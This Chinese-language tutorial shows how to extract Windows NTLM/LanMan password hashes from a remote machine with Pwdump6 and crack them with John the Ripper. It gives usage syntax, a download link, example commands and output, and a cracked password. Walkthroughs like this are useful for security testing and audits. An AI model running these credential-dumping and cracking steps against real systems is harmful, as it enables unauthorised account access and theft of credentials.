Pwdump:一款Windows密碼破解和恢復工具
我們也可以在Windows平臺上運行John the Ripper來破解Windows口令。但是,為了進行口令破解,必須首先運行一個工具,將Windows口令從SAM文件中提取出來,做這一步工作的原因在于Windows運行過程中SAM被鎖定,不能直接復制或編輯這個文件。Pwdump 6是一個免費的Windows實用程序,它能夠提取出Windows系統中的口令,并存儲在指定的文件中。Pwdump 6是Pwdump3e的改進版,該程序能夠從Windows目標中提取出NTLM和LanMan口令散列值,而不管是否啟用了Syskey(這是一個Windows賬戶數據庫加密工具,是Windows下的一條命令)。
下載鏈接:http://down.51cto.com/data/149269
Pwdump6的使用語法為:
pwdump [-h][-o][-u][-p][-n] machineName
其中:
machineName——目標計算機名稱。
-h——顯示本程序的用法。
-o——指定導出后的口令散列值的存儲文件。
-u——指定用于連接目標的用戶名。
-p——指定用于連接目標的口令。
-s——指定連接上使用的共享,而不是搜索共享。
-n——跳過口令歷史。
下面的示例訪問計算機aa-zcf,導出它的口令散列值到文件passwd.1中。
示例:導出計算機aa-zcf上的Windows口令。
執行下述命令:
G:\OpenSource\pwdump6-1.4.3\PwDumpRelease>PwDump -o
passwd.1 aa-zcf
pwdump6 Version 1.4.3 by fizzgig and the mighty
group at foofus.net Copyright 2006 foofus.net
This program is free software under the GNU
General Public License Version 2 (GNU GPL),
you can redistribute it and/or modify it under the
terms of the GNU GPL, as published by the Free
Software Foundation. NO WARRANTY, EXPRESSED OR
IMPLIED, IS GRANTED WITH THIS PROGRAM. Please see
the COPYING file included with this program and the
GNU GPL for further details.
Using pipe {2A553ABC-A93F-4E50-BB05-0386335F70C1}
Key length is 16
Completed.
現在我們可以運行John the Ripper來破解passwd.1文件中用戶的口令了。
示例:破解Windows口令。
執行下述命令:
G:\OpenSource\john171w\john1701\run\ john-386 passwd.1
Loaded 10 passwords with no different salts (NT LM DES [32/32 BS])
COMPUTE (user1:1)
R (user1:2)
請注意,user1的口令被劃分為兩部分。這是LANMAN口令散列的特點,它一次僅允許加密7個口令。由于LANMAN口令散列將所有口令都轉換為大寫,因此John the Ripper以大寫形式表達所有口令。
使用show開關,可以看到user1破解后的口令,如示例8-6所示。
示例:顯示破解后的Windows口令。
G:\OpenSource\john171w\john1701\run\ john-386 -show
user1:COMPUTER:1009:2B2AC2D1C7C8FDA6CEA80B5FAD7563AA:::
因此user1的口令為COMPUTER。